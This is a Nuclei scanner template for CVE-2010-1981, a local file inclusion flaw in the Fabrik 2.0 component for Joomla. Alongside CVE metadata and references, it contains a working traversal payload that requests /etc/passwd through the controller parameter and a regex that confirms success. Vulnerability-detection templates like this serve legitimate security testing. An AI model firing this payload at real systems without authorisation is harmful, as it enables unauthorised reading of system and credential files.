nuclei-templates/http/cves/2010/CVE-2010-1981.yaml

46 lines
1.7 KiB
YAML

id: CVE-2010-1981
info:
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/12087
- https://nvd.nist.gov/vuln/detail/CVE-2010-1981
- http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt
- http://www.exploit-db.com/exploits/12087
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57571
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-1981
cwe-id: CWE-22
epss-score: 0.00656
epss-percentile: 0.77155
cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:*
metadata:
max-request: 1
vendor: fabrikar
product: fabrik
framework: joomla\!
tags: cve,cve2010,joomla,lfi,edb,packetstorm,fabrikar,joomla\!
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100d80b9fc7fb3e35d2dc6047c33f3e7a7cba9925bc1dc99bc13ab184106a8af09f02206dac061cd8719aef9b943e898d44a6b25b552293c451030e89dc552354473fb4:922c64590222798bb761d5b6d8e72950